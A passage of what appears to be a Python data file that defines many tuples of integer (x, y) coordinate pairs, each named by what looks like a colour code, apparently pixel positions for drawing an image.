89), (76, 90), (76, 91), (76, 92), (76, 93), (76, 94), (76, 95), (76, 96), (76, 98), (77, 84), (77, 92), (77, 93), (77, 94), (77, 95), (77, 96), (77, 97), (77, 99), (78, 76), (78, 78), (78, 82), (78, 85), (78, 86), (78, 87), (78, 88), (78, 89), (78, 90), (78, 91), (78, 96), (78, 97), (78, 99), (79, 75), (79, 80), (79, 81), (79, 82), (79, 83), (79, 84), (79, 92), (79, 93), (79, 94), (79, 95), (79, 99), (80, 75), (80, 77), (80, 78), (80, 79), (80, 96), (80, 98), (80, 114), (80, 115), (81, 75), (81, 78), (81, 114), (81, 115), (82, 75), (82, 78), (82, 115), (83, 75), (83, 78), (83, 79), (83, 80), (83, 81), (83, 82), (83, 83), (83, 84), (83, 85), (83, 86), (83, 87), (83, 88), (83, 90), (84, 76), (84, 91), (85, 78), (85, 91), (86, 81), (86, 82), (86, 83), (86, 84), (86, 85), (86, 86), (86, 87), (86, 88), (86, 89), (86, 91)) coordinates_dcf8_a4 = ((90, 160), (90, 161), (91, 159), (91, 162), (92, 159), (92, 162), (93, 158), (93, 160), (93, 162), (94, 158), (94, 160), (94, 162), (95, 157), (95, 159), (95, 160), (95, 162), (96, 157), (96, 158), (96, 159), (96, 160), (96, 162), (97, 154), (97, 157), (97, 158), (97, 159), (97, 160), (97, 161), (97, 163), (98, 154), (98, 157), (98, 158), (98, 159), (98, 160), (98, 161), (98, 162), (98, 164), (99, 153), (99, 155), (99, 156), (99, 157), (99, 158), (99, 159), (99, 160), (99, 161), (99, 162), (99, 163), (99, 165), (100, 152), (100, 153), (100, 155), (100, 156), (100, 157), (100, 158), (100, 159), (100, 160), (100, 161), (100, 162), (100, 163), (100, 164), (100, 166), (101, 152), (101, 154), (101, 155), (101, 156), (101, 157), (101, 158), (101, 159), (101, 160), (101, 161), (101, 162), (101, 163), (101, 165), (102, 152), (102, 154), (102, 155), (102, 156), (102, 157), (102, 158), (102, 159), (102, 160), (102, 161), (102, 162), (102, 164), (103, 153), (103, 155), (103, 156), (103, 157), (103, 158), (103, 159), (103, 160), (103, 161), (103, 163), (104, 152), (104, 154), (104, 155), (104, 156), (104, 157), (104, 158), (104, 159), (104, 160), (104, 161), (104, 163), (105, 152), (105, 154), (105, 155), (105, 156), (105, 157), (105, 158), (105, 159), (105, 160), (105, 161), (105, 163), (106, 151), (106, 153), (106, 154), (106, 155), (106, 156), (106, 157), (106, 158), (106, 159), (106, 160), (106, 161), (106, 163), (107, 150), (107, 152), (107, 153), (107, 154), (107, 155), (107, 156), (107, 157), (107, 158), (107, 159), (107, 160), (107, 161), (107, 163), (108, 149), (108, 151), (108, 152), (108, 153), (108, 154), (108, 155), (108, 156), (108, 157), (108, 158), (108, 159), (108, 160), (108, 161), (108, 163), (109, 148), (109, 150), (109, 151), (109, 152), (109, 153), (109, 154), (109, 155), (109, 156), (109, 157), (109, 158), (109, 159), (109, 160), (109, 161), (109, 164), (110, 148), (110, 150), (110, 151), (110, 152), (110, 153), (110, 154), (110, 155), (110, 156), (110, 157), (110, 158), (110, 159), (110, 160), (110, 162), (110, 164), (111, 148), (111, 150), (111, 151), (111, 152), (111, 153), (111, 154), (111, 155), (111, 156), (111, 157), (111, 158), (111, 159), (111, 160), (111, 164), (112, 147), (112, 149), (112, 150), (112, 151), (112, 152), (112, 153), (112, 154), (112, 155), (112, 156), (112, 157), (112, 158), (112, 160), (113, 146), (113, 148), (113, 149), (113, 150), (113, 151), (113, 152), (113, 153), (113, 154), (113, 155), (113, 156), (113, 160), (114, 145), (114, 147), (114, 148), (114, 149), (114, 150), (114, 151), (114, 152), (114, 153), (114, 154), (114, 157), (114, 158), (114, 160), (115, 144), (115, 146), (115, 147), (115, 148), (115, 149), (115, 150), (115, 151), (115, 152), (115, 153), (116, 145), (116, 151), (116, 152), (116, 154), (117, 145), (117, 147), (117, 148), (117, 149), (117, 150), (117, 153), (118, 152)) coordinates_dbf8_a4 = ((127, 151), (128, 145), (128, 151), (128, 152), (129, 145), (129, 150), (129, 153), (130, 146), (130, 148), (130, 149), (130, 150), (130, 151), (130, 152), (130, 154), (131, 150), (131, 151), (131, 152), (131, 153), (132, 143), (132, 145), (132, 146), (132, 147), (132, 148), (132, 149), (132, 150), (132, 151), (132, 152), (132, 153), (132, 154), (132, 157), (132, 159), (133, 145), (133, 148), (133, 149), (133, 150), (133, 151), (133, 152), (133, 153), (133, 154), (133, 155), (133, 156), (133, 160), (134, 147), (134, 149), (134, 150), (134, 151), (134, 152), (134, 153), (134, 154), (134, 155), (134, 156), (134, 157), (134, 158), (134, 160), (135, 148), (135, 150), (135, 151), (135, 152), (135, 153), (135, 154), (135, 155), (135, 156), (135, 157), (135, 158), (135, 159), (135, 160), (135, 166), (136, 149), (136, 150), (136, 151), (136, 152), (136, 153), (136, 154), (136, 155), (136, 156), (136, 157), (136, 158), (136, 159), (136, 160), (136, 161), (136, 162), (136, 163), (136, 164), (136, 166), (137, 150), (137, 152), (137, 153), (137, 154), (137, 155), (137, 156), (137, 157), (137, 158), (137, 159), (137, 160), (137, 161), (137, 166), (138, 149), (138, 151), (138, 152), (138, 153), (138, 154), (138, 155), (138, 156), (138, 157), (138, 158), (138, 159), (138, 160), (138, 161), (138, 162), (138, 163), (138, 165), (139, 149), (139, 151), (139, 152), (139, 153), (139, 154), (139, 155), (139, 156), (139, 157), (139, 158), (139, 159), (139, 160), (139, 161), (139, 162), (139, 163), (139, 165), (140, 150), (140, 152), (140, 153), (140, 154), (140, 155), (140, 156), (140, 157), (140, 158), (140, 159), (140, 160), (140, 161), (140, 162), (140, 163), (140, 165), (141, 151), (141, 153), (141, 154), (141, 155), (141, 156), (141, 157), (141, 158), (141, 159), (141, 160), (141, 161), (141, 162), (141, 163), (141, 165), (142, 152), (142, 154), (142, 155), (142, 156), (142, 157), (142, 158), (142, 159), (142, 160), (142, 161), (142, 162), (142, 163), (142, 164), (142, 165), (143, 152), (143, 154), (143, 155), (143, 156), (143, 157), (143, 158), (143, 159), (143, 160), (143, 161), (143, 162), (143, 163), (143, 164), (143, 165), (143, 167), (143, 169), (144, 152), (144, 154), (144, 155), (144, 156), (144, 157), (144, 158), (144, 159), (144, 160), (144, 161), (144, 162), (144, 163), (144, 164), (144, 165), (145, 153), (145, 155), (145, 156), (145, 157), (145, 158), (145, 159), (145, 160), (145, 161), (145, 162), (145, 163), (145, 164), (145, 166), (146, 153), (146, 155), (146, 156), (146, 157), (146, 158), (146, 159), (146, 160), (146, 161), (146, 162), (146, 163), (146, 165), (147, 153), (147, 157), (147, 158), (147, 159), (147, 160), (147, 161), (147, 162), (147, 163), (147, 165), (148, 153), (148, 155), (148, 158), (148, 159), (148, 160), (148, 161), (148, 162), (148, 163), (148, 165), (149, 157), (149, 159), (149, 160), (149, 161), (149, 162), (149, 163), (149, 165), (150, 158), (150, 160), (150, 161), (150, 162), (150, 163), (150, 165), (151, 158), (151, 160), (151, 161), (151, 162), (151, 163), (151, 164), (151, 166), (152, 159), (152, 161), (152, 162), (152, 163), (152, 167), (153, 159), (153, 161), (153, 162), (153, 164), (154, 159), (154, 160), (154, 161), (154, 163), (155, 160), (155, 163), (156, 160), (156, 162), (156, 163), (157, 161), (157, 162), (158, 161), (158, 162), (159, 162), (160, 162), (161, 162)) coordinates_2_acca4 = ((114, 162), (115, 161), (116, 160), (117, 156), (117, 159), (118, 155), (118, 158), (119, 158), (120, 153), (120, 157), (121, 152), (121, 154), (121, 156), (122, 152), (122, 155), (123, 152), (123, 154), (124, 151), (124, 153), (124, 155), (125, 152), (125, 155), (126, 152), (126, 156), (127, 156), (127, 158), (128, 155), (128, 159), (129, 156), (129, 160), (130, 157), (130, 159), (130, 161), (131, 161), (132, 162)) coordinates_60_cc60 = ((75, 161), (75, 163), (76, 161), (76, 165), (77, 160), (77, 162), (77, 163), (77, 166), (78, 160), (78, 162), (78, 163), (78, 164), (78, 165), (78, 167), (79, 159), (79, 161), (79, 162), (79, 163), (79, 164), (79, 165), (79, 166), (79, 168), (80, 159), (80, 161), (80, 162), (80, 163), (80, 164), (80, 165), (80, 166), (80, 167), (80, 169), (81, 157), (81, 159), (81, 160), (81, 161), (81, 162), (81, 163), (81, 164), (81, 165), (81, 166), (81, 167), (81, 168), (81, 170), (82, 156), (82, 159), (82, 160), (82, 161), (82, 162), (82, 163), (82, 164), (82, 165), (82, 166), (82, 167), (82, 168), (82, 170), (83, 155), (83, 158), (83, 159), (83, 160), (83, 161), (83, 162), (83, 163), (83, 164), (83, 165), (83, 166), (83, 167), (83, 168), (83, 170), (84, 155), (84, 157), (84, 158), (84, 159), (84, 160), (84, 161), (84, 162), (84, 163), (84, 164), (84, 165), (84, 166), (84, 167), (84, 168), (84, 169), (84, 170), (84, 171), (85, 155), (85, 157), (85, 158), (85, 159), (85, 160), (85, 161), (85, 162), (85, 163), (85, 164), (85, 165), (85, 166), (85, 167), (85, 168), (85, 169), (85, 171), (86, 154), (86, 156), (86, 157), (86, 158), (86, 159), (86, 160), (86, 161), (86, 162), (86, 163), (86, 164), (86, 165), (86, 166), (86, 167), (86, 168), (86, 169), (86, 171), (87, 154), (87, 156), (87, 157), (87, 158), (87, 163), (87, 164), (87, 165), (87, 166), (87, 167), (87, 168), (87, 169), (87, 171), (88, 153), (88, 155), (88, 156), (88, 157), (88, 164), (88, 165), (88, 166), (88, 167), (88, 168), (88, 169), (88, 171), (89, 153), (89, 155), (89, 156), (89, 158), (89, 163), (89, 165), (89, 166), (89, 167), (89, 168), (89, 169), (89, 171), (90, 152), (90, 154), (90, 155), (90, 156), (90, 158), (90, 164), (90, 166), (90, 167), (90, 168), (90, 169), (90, 170), (90, 172), (91, 151), (91, 153), (91, 154), (91, 155), (91, 157), (91, 164), (91, 166), (91, 167), (91, 168), (91, 169), (91, 170), (91, 172), (92, 151), (92, 153), (92, 154), (92, 155), (92, 156), (92, 164), (92, 166), (92, 167), (92, 168), (92, 169), (92, 170), (92, 172), (93, 150), (93, 152), (93, 154), (93, 156), (93, 164), (93, 166), (93, 167), (93, 168), (93, 169), (93, 170), (93, 171), (93, 173), (94, 150), (94, 152), (94, 164), (94, 166), (94, 167), (94, 168), (94, 169), (94, 170), (94, 171), (94, 173), (95, 149), (95, 151), (95, 155), (95, 164), (95, 166), (95, 167), (95, 168), (95, 169), (95, 170), (95, 171), (95, 173), (96, 148), (96, 151), (96, 164), (96, 167), (96, 168), (96, 169), (96, 170), (96, 171), (96, 173), (97, 148), (97, 151), (97, 165), (97, 168), (97, 169), (97, 170), (97, 171), (97, 173), (98, 147), (98, 149), (98, 151), (98, 167), (98, 169), (98, 170), (98, 171), (98, 173), (99, 146), (99, 148), (99, 149), (99, 151), (99, 167), (99, 169), (99, 170), (99, 172), (100, 145), (100, 147), (100, 148), (100, 150), (100, 168), (100, 170), (100, 172), (101, 144), (101, 146), (101, 147), (101, 148), (101, 150), (101, 168), (101, 170), (101, 172), (102, 143), (102, 145), (102, 146), (102, 147), (102, 148), (102, 150), (102, 167), (102, 169), (102, 170), (102, 172), (103, 142), (103, 144), (103, 145), (103, 146), (103, 147), (103, 148), (103, 150), (103, 166), (103, 168), (103, 169), (103, 170), (103, 171), (103, 172), (104, 141), (104, 143), (104, 144), (104, 145), (104, 146), (104, 147), (104, 148), (104, 150), (104, 165), (104, 167), (104, 168), (104, 169), (104, 170), (104, 171), (104, 172), (105, 141), (105, 143), (105, 144), (105, 145), (105, 146), (105, 147), (105, 149), (105, 165), (105, 167), (105, 168), (105, 169), (105, 170), (105, 172), (106, 140), (106, 142), (106, 143), (106, 144), (106, 145), (106, 146), (106, 148), (106, 165), (106, 167), (106, 168), (106, 169), (106, 170), (106, 171), (106, 173), (107, 139), (107, 141), (107, 142), (107, 143), (107, 144), (107, 145), (107, 147), (107, 165), (107, 167), (107, 168), (107, 169), (107, 170), (107, 171), (107, 172), (107, 174), (108, 139), (108, 141), (108, 142), (108, 143), (108, 144), (108, 146), (108, 166), (108, 168), (108, 169), (108, 170), (108, 171), (108, 172), (108, 175), (109, 138), (109, 140), (109, 141), (109, 142), (109, 143), (109, 144), (109, 146), (109, 166), (109, 168), (109, 169), (109, 170), (109, 171), (109, 172), (109, 173), (109, 176), (110, 137), (110, 139), (110, 140), (110, 141), (110, 142), (110, 143), (110, 144), (110, 146), (110, 166), (110, 168), (110, 169), (110, 170), (110, 171), (110, 172), (110, 173), (110, 174), (110, 175), (110, 177), (111, 136), (111, 138), (111, 139), (111, 140), (111, 141), (111, 142), (111, 143), (111, 145), (111, 166), (111, 168), (111, 169), (111, 170), (111, 171), (111, 172), (111, 173), (111, 174), (111, 175), (111, 176), (111, 178), (112, 135), (112, 137), (112, 138), (112, 139), (112, 140), (112, 141), (112, 142), (112, 144), (112, 162), (112, 166), (112, 168), (112, 169), (112, 170), (112, 171), (112, 172), (112, 173), (112, 174), (112, 175), (112, 176), (112, 177), (112, 179), (113, 133), (113, 136), (113, 137), (113, 138), (113, 139), (113, 140), (113, 141), (113, 143), (113, 164), (113, 166), (113, 167), (113, 168), (113, 169), (113, 170), (113, 171), (113, 172), (113, 173), (113, 174), (113, 175), (113, 176), (113, 177), (113, 178), (113, 180), (114, 132), (114, 135), (114, 136), (114, 137), (114, 138), (114, 139), (114, 140), (114, 142), (114, 164), (114, 166), (114, 167), (114, 168), (114, 169), (114, 170), (114, 171), (114, 172), (114, 173), (114, 174), (114, 175), (114, 176), (114, 177), (114, 178), (114, 180), (115, 131), (115, 142), (115, 163), (115, 164), (115, 166), (115, 167), (115, 168), (115, 169), (115, 170), (115, 171), (115, 172), (115, 173), (115, 174), (115, 175), (115, 176), (115, 177), (115, 180), (116, 130), (116, 132), (116, 133), (116, 134), (116, 135), (116, 136), (116, 137), (116, 138), (116, 139), (116, 140), (116, 142), (116, 163), (116, 165), (116, 166), (116, 167), (116, 168), (116, 169), (116, 170), (116, 171), (116, 172), (116, 173), (116, 178), (116, 180), (117, 127), (117, 162), (117, 164), (117, 165), (117, 166), (117, 167), (117, 168), (117, 169), (117, 170), (117, 171), (117, 174), (117, 175), (117, 176), (117, 177), (118, 161), (118, 163), (118, 164), (118, 165), (118, 166), (118, 167), (118, 168), (118, 169), (118, 170), (118, 172), (118, 173), (119, 161), (119, 163), (119, 164), (119, 165), (119, 166), (119, 168), (119, 169), (119, 171), (120, 162), (120, 170), (121, 163), (121, 165), (121, 166), (121, 169)) coordinates_5_fcc60 = ((123, 165), (123, 167), (123, 169), (124, 165), (124, 169), (125, 162), (125, 166), (125, 167), (125, 169), (126, 161), (126, 164), (126, 165), (126, 166), (126, 167), (126, 168), (126, 170), (127, 163), (127, 164), (127, 165), (127, 166), (127, 167), (127, 168), (127, 169), (127, 171), (128, 147), (128, 148), (128, 161), (128, 163), (128, 164), (128, 165), (128, 166), (128, 167), (128, 168), (128, 169), (128, 170), (128, 172), (129, 131), (129, 133), (129, 134), (129, 135), (129, 136), (129, 137), (129, 138), (129, 139), (129, 140), (129, 141), (129, 143), (129, 162), (129, 164), (129, 165), (129, 166), (129, 167), (129, 168), (129, 169), (129, 170), (129, 171), (129, 173), (130, 132), (130, 141), (130, 142), (130, 144), (130, 163), (130, 165), (130, 166), (130, 167), (130, 168), (130, 169), (130, 170), (130, 171), (130, 172), (130, 175), (131, 133), (131, 136), (131, 137), (131, 138), (131, 139), (131, 140), (131, 164), (131, 166), (131, 167), (131, 168), (131, 169), (131, 170), (131, 171), (131, 172), (131, 173), (131, 176), (131, 177), (132, 134), (132, 137), (132, 138), (132, 140), (132, 164), (132, 168), (132, 169), (132, 170), (132, 171), (132, 172), (132, 173), (132, 174), (132, 175), (132, 178), (132, 179), (132, 180), (132, 181), (132, 183), (133, 138), (133, 139), (133, 141), (133, 164), (133, 166), (133, 168), (133, 169), (133, 170), (133, 171), (133, 172), (133, 173), (133, 174), (133, 175), (133, 176), (133, 177), (134, 137), (134, 139), (134, 140), (134, 143), (134, 162), (134, 168), (134, 170), (134, 171), (134, 172), (134, 173), (134, 174), (134, 175), (134, 176), (134, 177), (134, 178), (134, 179), (134, 180), (134, 181), (134, 183), (135, 138), (135, 140), (135, 141), (135, 145), (135, 168), (135, 170), (135, 171), (135, 172), (135, 173), (135, 174), (135, 175), (135, 176), (135, 177), (135, 178), (135, 179), (135, 180), (135, 181), (135, 183), (136, 141), (136, 142), (136, 143), (136, 147), (136, 168), (136, 170), (136, 171), (136, 172), (136, 173), (136, 174), (136, 175), (136, 176), (136, 177), (136, 178), (136, 179), (136, 180), (136, 182), (137, 139), (137, 141), (137, 142), (137, 143), (137, 144), (137, 145), (137, 147), (137, 168), (137, 170), (137, 171), (137, 172), (137, 173), (137, 174), (137, 175), (137, 176), (137, 177), (137, 178), (137, 179), (137, 180), (137, 182), (138, 140), (138, 142), (138, 143), (138, 144), (138, 145), (138, 147), (138, 168), (138, 170), (138, 171), (138, 172), (138, 173), (138, 174), (138, 175), (138, 176), (138, 177), (138, 178), (138, 179), (138, 180), (138, 182), (139, 141), (139, 143), (139, 144), (139, 145), (139, 147), (139, 167), (139, 169), (139, 170), (139, 171), (139, 172), (139, 173), (139, 174), (139, 175), (139, 176), (139, 177), (139, 178), (139, 179), (139, 181), (140, 142), (140, 144), (140, 145), (140, 147), (140, 167), (140, 171), (140, 172), (140, 173), (140, 174), (140, 175), (140, 176), (140, 177), (140, 181), (141, 142), (141, 144), (141, 145), (141, 146), (141, 148), (141, 167), (141, 169), (141, 170), (141, 171), (141, 172), (141, 173), (141, 174), (141, 175), (141, 176), (141, 179), (142, 143), (142, 145), (142, 146), (142, 147), (142, 150), (142, 172), (142, 174), (142, 175), (142, 177), (143, 144), (143, 146), (143, 147), (143, 148), (143, 150), (143, 172), (143, 174), (143, 176), (144, 145), (144, 147), (144, 148), (144, 150), (144, 170), (144, 172), (144, 173), (144, 175), (145, 145), (145, 147), (145, 148), (145, 150), (145, 169), (145, 172), (145, 174), (146, 146), (146, 148), (146, 149), (146, 151), (146, 168), (146, 170), (146, 171), (146, 172), (146, 174), (147, 146), (147, 148), (147, 149), (147, 151), (147, 167), (147, 169), (147, 170), (147, 171), (147, 172), (147, 174), (148, 147), (148, 149), (148, 151), (148, 167), (148, 169), (148, 170), (148, 171), (148, 172), (148, 174), (149, 147), (149, 149), (149, 151), (149, 167), (149, 169), (149, 170), (149, 171), (149, 172), (149, 174), (150, 148), (150, 150), (150, 151), (150, 152), (150, 155), (150, 168), (150, 170), (150, 171), (150, 172), (150, 174), (151, 149), (151, 151), (151, 153), (151, 156), (151, 169), (151, 171), (151, 172), (151, 174), (152, 150), (152, 152), (152, 154), (152, 156), (152, 169), (152, 171), (152, 172), (152, 174), (153, 150), (153, 152), (153, 153), (153, 154), (153, 155), (153, 157), (153, 168), (153, 170), (153, 171), (153, 172), (153, 174), (154, 151), (154, 153), (154, 154), (154, 155), (154, 157), (154, 165), (154, 166), (154, 168), (154, 169), (154, 170), (154, 171), (154, 172), (154, 174), (155, 152), (155, 154), (155, 155), (155, 156), (155, 158), (155, 165), (155, 168), (155, 169), (155, 170), (155, 171), (155, 173), (156, 152), (156, 154), (156, 155), (156, 156), (156, 158), (156, 165), (156, 167), (156, 168), (156, 169), (156, 170), (156, 171), (156, 173), (157, 153), (157, 155), (157, 156), (157, 158), (157, 165), (157, 167), (157, 168), (157, 169), (157, 170), (157, 172), (158, 153), (158, 155), (158, 156), (158, 157), (158, 159), (158, 164), (158, 165), (158, 166), (158, 167), (158, 168), (158, 169), (158, 170), (158, 172), (159, 153), (159, 155), (159, 156), (159, 157), (159, 159), (159, 164), (159, 166), (159, 167), (159, 168), (159, 169), (159, 170), (159, 172), (160, 154), (160, 156), (160, 157), (160, 158), (160, 160), (160, 164), (160, 166), (160, 167), (160, 168), (160, 169), (160, 171), (161, 154), (161, 156), (161, 157), (161, 158), (161, 160), (161, 164), (161, 166), (161, 167), (161, 168), (161, 169), (161, 171), (162, 155), (162, 157), (162, 158), (162, 159), (162, 161), (162, 164), (162, 166), (162, 167), (162, 168), (162, 170), (163, 155), (163, 157), (163, 158), (163, 159), (163, 160), (163, 163), (163, 164), (163, 165), (163, 166), (163, 167), (163, 168), (163, 170), (164, 155), (164, 157), (164, 158), (164, 159), (164, 160), (164, 161), (164, 164), (164, 165), (164, 166), (164, 167), (164, 169), (165, 155), (165, 157), (165, 158), (165, 159), (165, 160), (165, 161), (165, 162), (165, 163), (165, 164), (165, 165), (165, 166), (165, 168), (166, 155), (166, 157), (166, 158), (166, 159), (166, 160), (166, 161), (166, 162), (166, 163), (166, 164), (166, 165), (166, 167), (167, 155), (167, 160), (167, 161), (167, 162), (167, 163), (167, 164), (167, 166), (168, 155), (168, 158), (168, 161), (168, 162), (168, 165), (169, 156), (169, 160), (169, 164), (170, 155), (170, 161)) coordinates_f4_deb3 = ((128, 65), (129, 64), (129, 65), (130, 64), (130, 65), (131, 63), (132, 63), (132, 64), (133, 63), (133, 64), (134, 63), (135, 63), (135, 65), (135, 73), (136, 63), (136, 67), (136, 70), (137, 64), (137, 68), (137, 72), (137, 74), (138, 67), (138, 69), (138, 70), (138, 71), (138, 75), (139, 67), (139, 69), (139, 73), (140, 66), (140, 71), (141, 66), (141, 69), (142, 65), (142, 67), (143, 64), (143, 66), (144, 66), (144, 71), (144, 73), (144, 75), (145, 65), (145, 66), (145, 70), (145, 75), (146, 65), (146, 66), (146, 72), (146, 92), (146, 94), (147, 65), (147, 66), (147, 89), (147, 90), (147, 95), (148, 65), (148, 67), (148, 87), (148, 88), (148, 91), (148, 92), (148, 95), (149, 66), (149, 68), (149, 84), (149, 85), (149, 86), (149, 89), (149, 90), (149, 91), (149, 92), (149, 95), (150, 66), (150, 69), (150, 79), (150, 80), (150, 81), (150, 82), (150, 83), (150, 87), (150, 88), (150, 89), (150, 90), (150, 91), (150, 92), (150, 95), (151, 66), (151, 72), (151, 73), (151, 74), (151, 75), (151, 76), (151, 77), (151, 78), (151, 84), (151, 85), (151, 86), (151, 87), (151, 88), (151, 89), (151, 90), (151, 92), (152, 67), (152, 71), (152, 79), (152, 80), (152, 81), (152, 82), (152, 83), (152, 84), (152, 85), (152, 86), (152, 87), (152, 88), (152, 89), (152, 91), (153, 68), (153, 70), (153, 71), (153, 74), (153, 75), (153, 76), (153, 77), (153, 78), (153, 79), (153, 80), (153, 81), (153, 82), (153, 83), (153, 84), (153, 85), (153, 86), (153, 87), (153, 88), (153, 89), (153, 91), (154, 72), (154, 74), (154, 75), (154, 76), (154, 77), (154, 78), (154, 79), (154, 80), (154, 81), (154, 82), (154, 83), (154, 84), (154, 85), (154, 86), (154, 87), (154, 88), (154, 90), (155, 74), (155, 76), (155, 77), (155, 78), (155, 79), (155, 80), (155, 81), (155, 82), (155, 83), (155, 84), (155, 85), (155, 86), (155, 89), (156, 74), (156, 76), (156, 77), (156, 78), (156, 79), (156, 80), (156, 81), (156, 82), (156, 83), (156, 88), (157, 74), (157, 76), (157, 77), (157, 78), (157, 79), (157, 80), (157, 84), (157, 86), (158, 74), (158, 76), (158, 77), (158, 78), (158, 82), (158, 83), (159, 74), (159, 78), (159, 79), (159, 80), (160, 76), (160, 77)) coordinates_ff00_fe = ((124, 94), (124, 96), (124, 97), (124, 98), (124, 99), (124, 100), (124, 101), (124, 102), (124, 103), (124, 104), (124, 106), (125, 94), (125, 107), (126, 95), (126, 97), (126, 98), (126, 99), (126, 100), (126, 101), (126, 103), (126, 104), (126, 106), (126, 111), (127, 95), (127, 97), (127, 98), (127, 99), (127, 100), (127, 101), (127, 105), (127, 107), (127, 109), (127, 113), (127, 114), (127, 115), (127, 116), (127, 117), (127, 118), (127, 120), (128, 96), (128, 98), (128, 99), (128, 101), (128, 106), (128, 108), (128, 111), (128, 112), (128, 113), (128, 114), (128, 122), (129, 97), (129, 100), (129, 107), (129, 110), (129, 115), (129, 118), (129, 119), (129, 120), (129, 124), (130, 100), (130, 107), (130, 108), (130, 117), (130, 121), (130, 122), (130, 123), (130, 126), (130, 127), (130, 129), (131, 98), (131, 100), (131, 118), (131, 120), (131, 125), (131, 129), (132, 99), (132, 126), (132, 128), (133, 126), (133, 128), (134, 126), (134, 128), (135, 126), (135, 129), (136, 126), (136, 129), (137, 125), (137, 127), (137, 128), (137, 130), (138, 125), (138, 127), (138, 128), (138, 130), (139, 126), (139, 128), (139, 130), (140, 127), (140, 130), (141, 129), (142, 128), (143, 127)) coordinates_fe00_ff = ((102, 130), (103, 129), (103, 130), (104, 129), (104, 130), (105, 129), (105, 130), (106, 129), (106, 130), (107, 129), (107, 130), (108, 100), (108, 101), (108, 129), (108, 130), (109, 99), (109, 101), (109, 130), (110, 99), (110, 101), (110, 128), (110, 130), (111, 98), (111, 101), (111, 127), (111, 130), (112, 97), (112, 99), (112, 101), (112, 126), (112, 129), (113, 97), (113, 99), (113, 101), (113, 122), (113, 125), (113, 127), (113, 129), (114, 97), (114, 99), (114, 100), (114, 101), (114, 102), (114, 108), (114, 121), (114, 123), (114, 124), (114, 129), (115, 94), (115, 95), (115, 97), (115, 98), (115, 99), (115, 100), (115, 102), (115, 108), (115, 109), (115, 120), (115, 126), (115, 128), (116, 94), (116, 97), (116, 98), (116, 99), (116, 100), (116, 102), (116, 108), (116, 110), (116, 119), (116, 122), (116, 123), (116, 124), (116, 125), (117, 94), (117, 96), (117, 97), (117, 98), (117, 99), (117, 100), (117, 102), (117, 107), (117, 108), (117, 118), (117, 121), (118, 94), (118, 96), (118, 97), (118, 98), (118, 99), (118, 100), (118, 102), (118, 107), (118, 109), (118, 112), (118, 117), (118, 120), (119, 94), (119, 96), (119, 97), (119, 98), (119, 99), (119, 100), (119, 101), (119, 103), (119, 106), (119, 108), (119, 109), (119, 110), (119, 113), (119, 114), (119, 115), (119, 116), (119, 119), (120, 94), (120, 105), (120, 109), (120, 112), (120, 118), (121, 94), (121, 96), (121, 97), (121, 98), (121, 99), (121, 100), (121, 101), (121, 102), (121, 103), (121, 104), (121, 105), (121, 106), (121, 107), (121, 109), (121, 112), (121, 113), (121, 116)) coordinates_26408_b = ((124, 84), (124, 86), (124, 87), (124, 88), (124, 89), (124, 90), (124, 91), (124, 92), (125, 82), (125, 92), (126, 82), (126, 84), (126, 86), (126, 88), (126, 89), (126, 90), (126, 92), (127, 82), (127, 84), (127, 87), (127, 89), (127, 90), (127, 91), (127, 93), (128, 83), (128, 88), (128, 90), (128, 91), (128, 93), (129, 83), (129, 88), (129, 90), (129, 91), (129, 93), (130, 83), (130, 89), (130, 91), (130, 92), (130, 94), (131, 84), (131, 90), (131, 92), (131, 94), (132, 84), (132, 90), (132, 92), (132, 93), (132, 95), (133, 85), (133, 91), (133, 93), (133, 95), (134, 86), (134, 92), (134, 95), (135, 93), (135, 95)) coordinates_798732 = ((124, 70), (124, 72), (124, 73), (124, 74), (124, 75), (124, 76), (124, 78), (125, 67), (125, 71), (125, 72), (125, 73), (125, 80), (126, 67), (126, 69), (126, 78), (126, 80), (127, 78), (127, 80), (128, 79), (128, 80), (129, 79), (129, 81), (130, 73), (130, 79), (130, 81), (131, 80), (131, 82), (132, 80), (132, 82), (133, 81), (133, 83), (134, 81), (134, 83), (135, 83), (135, 84), (136, 84), (136, 85)) coordinates_f5_deb3 = ((86, 72), (87, 70), (87, 74), (88, 72), (88, 75), (88, 91), (88, 92), (89, 69), (89, 71), (89, 80), (89, 81), (89, 82), (89, 83), (89, 84), (89, 85), (89, 86), (89, 87), (89, 88), (89, 89), (89, 90), (89, 92), (90, 68), (90, 70), (90, 72), (90, 76), (90, 78), (90, 92), (91, 68), (91, 71), (91, 79), (91, 80), (91, 81), (91, 82), (91, 83), (91, 84), (91, 92), (92, 67), (92, 70), (92, 85), (92, 86), (92, 87), (92, 88), (92, 89), (92, 91), (93, 67), (93, 69), (94, 67), (94, 68), (94, 69), (94, 70), (94, 71), (94, 75), (95, 66), (95, 68), (95, 69), (95, 70), (95, 71), (95, 72), (95, 73), (95, 76), (96, 67), (96, 69), (96, 70), (96, 71), (96, 73), (96, 74), (96, 75), (96, 78), (97, 67), (97, 69), (97, 70), (97, 71), (97, 72), (97, 73), (97, 74), (97, 75), (97, 76), (97, 79), (98, 67), (98, 69), (98, 70), (98, 71), (98, 72), (98, 73), (98, 74), (98, 75), (98, 76), (98, 77), (98, 78), (98, 81), (99, 67), (99, 69), (99, 70), (99, 71), (99, 72), (99, 73), (99, 79), (99, 82), (100, 67), (100, 69), (100, 70), (100, 71), (100, 72), (100, 73), (100, 74), (100, 75), (100, 76), (100, 77), (100, 78), (100, 84), (101, 67), (101, 69), (101, 70), (101, 71), (101, 73), (101, 79), (101, 80), (101, 81), (101, 82), (101, 84), (102, 68), (102, 70), (102, 71), (102, 73), (103, 69), (103, 71), (103, 73), (104, 70), (104, 75), (104, 76), (104, 78), (105, 71), (105, 73), (105, 74), (105, 75), (105, 76), (105, 77), (105, 79), (106, 80)) coordinates_016400 = ((132, 131), (132, 132), (133, 130), (133, 133), (134, 131), (134, 134), (135, 131), (135, 133), (135, 135), (136, 131), (136, 132), (136, 136), (137, 132), (137, 137), (138, 132), (138, 135), (138, 138), (139, 132), (139, 136), (139, 139), (140, 132), (140, 137), (140, 139), (141, 132), (141, 137), (141, 139), (142, 131), (142, 132), (142, 136), (142, 138), (143, 130), (143, 131), (143, 135), (143, 137), (144, 129), (144, 130), (144, 135), (144, 137), (145, 134), (145, 136), (146, 133), (146, 135), (147, 132), (147, 134), (148, 132), (148, 134), (149, 132), (149, 134), (150, 132), (150, 134), (151, 132), (151, 134), (152, 132), (152, 134), (153, 132), (153, 134), (154, 133), (154, 134), (155, 134)) coordinates_b8_edc2 = ((118, 129), (118, 131), (118, 132), (118, 133), (118, 134), (118, 135), (118, 136), (118, 137), (118, 138), (118, 139), (118, 140), (118, 141), (118, 142), (118, 143), 